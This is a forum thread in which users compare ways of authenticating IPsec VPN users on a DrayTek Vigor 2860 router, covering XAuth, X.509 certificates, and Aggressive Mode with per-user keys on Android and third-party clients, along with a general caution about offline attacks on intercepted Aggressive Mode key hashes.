//cont'd//

2. XAuth authentication support, recently appeared on the Vigor 2860. I'm puzzled as to how this has been implemented - and I've not really got it to work.
   
   This: https://www.juniper.net/documentation/en_US/nsm2012.2/topics/concept/security-service-firewall-xauth-user-authentication-overview.html
   implies that it although it can authenticate a "user", it can also authenticate a "device". Draytek's implementation (on the 2860) seems to take the form of another global PSK, so maybe it's the latter :? On the 2860, at least, it doesn't seem to help, in authenticating individuals.
   
   

   An XAuth user (or user group) is a RAS user who authenticates when connecting to the security device using an AutoKey IKE VPN tunnel. Although both IKE and XAuth users can authenticate through an AutoKey IKE VPN tunnel, the authentication of IKE users is actually the authentication of VPN gateways or clients, while the authentication of XAuth users is the authentication of the individuals themselves. XAuth users must enter information that only they are supposed to know—their username and password.




4. Finally, X.509 certificates do work as a means of authenticating users, (at the IPsec level). Getting that certificate infrastructure in place, can be quite entertaining :wink:

Thanks for that Hornbyp!

My friend said that trying to get X.509 working resulted in him losing a few hairs.

If have any more updates from tinkering, I'll add them here.

Thanks again.

I wrote: The Android client (8.0 and maybe others) can be made to use Aggressive Mode, along with its per-user PSK. Unfortunately, the Vigor 2860 cannot be made to respond to it properly.

A variety of 3rd party VPN clients exist (though all seem to be commercial offerings). Some of these offer Aggressive Mode. I might investigate if any of them can successfully connect to the Vigor 2860, as a means of shedding light on the failure point in (4.) above.

I tried a VPN client from Zyxel (Zywall?) ... which seems to be a rebranded version of the Greenbow client (and is a similar sort of price ). That connected quickly and easily to the 2860, using Aggressive mode and a per-user key. So, whatever the issue is with Android, it does seem to be at the Android end.

However, having done some more research into Aggressive Mode, it seems it needs to be used with caution. If you're connecting directly to an ISP at each end of the link, the chance of the plain text PSK hash being intercepted is pretty low (unless the ISP is under the influence of a government agency!).
However, if you're connecting via some dodgy WiFi network (that you don't trust and hence the use of the VPN), it definitely could happen. Once the PSK hash has been acquired, an attacker can spend as long as they want, mounting offline attacks against it. So its use in (say) a Chinese hotel might not be advisable :o ...

See: https://www.pivotpointsecurity.com/blog/vpn-security-risks-main-aggressive-mode/

I also wrote: XAuth authentication support, recently appeared on the Vigor 2860. I'm puzzled as to how this has been implemented - and I've not really got it to work.

Revisiting this, I remembered that I did get it working on Android; the problem on Windows, being that it's only supported by the 3rd party (£) VPN clients. The downside to XAuth is that it also uses a Global PSK and needs a local (not Radius) Dial-in user. The global PSK is effectively authenticating the device - but, if compromised, doesn't seem to be of any use by itself (unlike the global "IPsec" General key).